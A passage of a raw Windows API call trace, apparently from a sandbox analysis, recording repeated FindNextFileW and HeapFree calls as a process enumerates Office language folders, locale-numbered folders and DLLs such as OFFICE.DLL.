cAlternateFileName="")) returned 1 [0185.478] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.478] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0185.480] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.480] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf458770a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0185.483] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.483] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf05741b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gl", cAlternateFileName="")) returned 1 [0185.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.527] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he", cAlternateFileName="")) returned 1 [0185.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.530] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1de43d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0185.533] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.533] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f23aa6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr", cAlternateFileName="")) returned 1 [0185.536] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.536] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe4d066, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16710914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0185.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.539] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf158c060, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0185.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.542] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41a796b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf41cdbc1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Interop.MSDASC.dll", cAlternateFileName="INTERO~1.DLL")) returned 1 [0185.545] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.545] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0185.548] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.548] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2ebae3b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kk", cAlternateFileName="")) returned 1 [0185.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.551] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe4d066, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0185.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.553] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0185.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.556] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf10a1263, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0185.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.559] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf632eb9d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MDXQueryGenerator.DLL", cAlternateFileName="MDXQUE~1.DLL")) returned 1 [0185.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.684] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03d07a0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167f56e9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0185.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.686] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45d3b76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0185.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.689] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5ad675f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5ad675f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5ad675f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6faa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE.DLL", cAlternateFileName="")) returned 1 [0185.692] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.692] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa879350, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ba48, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPivotExcelClientAddIn.dll", cAlternateFileName="POWERP~1.DLL")) returned 1 [0185.695] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.695] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0185.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.698] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfae48f06, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfae48f06, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfae6f174, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReportingServicesNativeClient.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0185.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.698] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefee59ce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefee59ce, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1026", cAlternateFileName="")) returned 1 [0185.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.698] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1755c61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1755c61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1755c61, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="10266", cAlternateFileName="")) returned 1 [0185.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.699] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4266542, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4266542, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4266542, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1027", cAlternateFileName="")) returned 1 [0185.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.699] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd42fe2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1028", cAlternateFileName="")) returned 1 [0185.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.699] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf632eb9d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1029", cAlternateFileName="")) returned 1 [0185.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.699] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaf7a22a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf7a22a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfaf7a22a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1030", cAlternateFileName="")) returned 1 [0185.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.699] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x633d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x633d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1031", cAlternateFileName="")) returned 1 [0185.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.700] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e6a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x51e6a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x51e6a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1032", cAlternateFileName="")) returned 1 [0185.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.700] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42d8c51, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42fef17, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42fef17, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 1 [0185.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.700] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a56cbe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a7cf13, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1035", cAlternateFileName="")) returned 1 [0185.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.700] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa911c96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa911c96, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa911c96, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1036", cAlternateFileName="")) returned 1 [0185.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.700] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1037", cAlternateFileName="")) returned 1 [0185.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.701] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88e2fa3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x88e2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x88e2fa3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1038", cAlternateFileName="")) returned 1 [0185.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.701] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x381f2dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1040", cAlternateFileName="")) returned 1 [0185.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.701] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6355df6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1041", cAlternateFileName="")) returned 1 [0185.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.701] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf048f354, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf048f354, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf048f354, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1042", cAlternateFileName="")) returned 1 [0185.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.701] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x303975a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x303975a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x303975a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1043", cAlternateFileName="")) returned 1 [0185.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.701] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf61d7668, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61fd8b4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61fd8b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1044", cAlternateFileName="")) returned 1 [0185.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0185.702] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2ebae3b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf2ebae3b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf2ebae3b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, 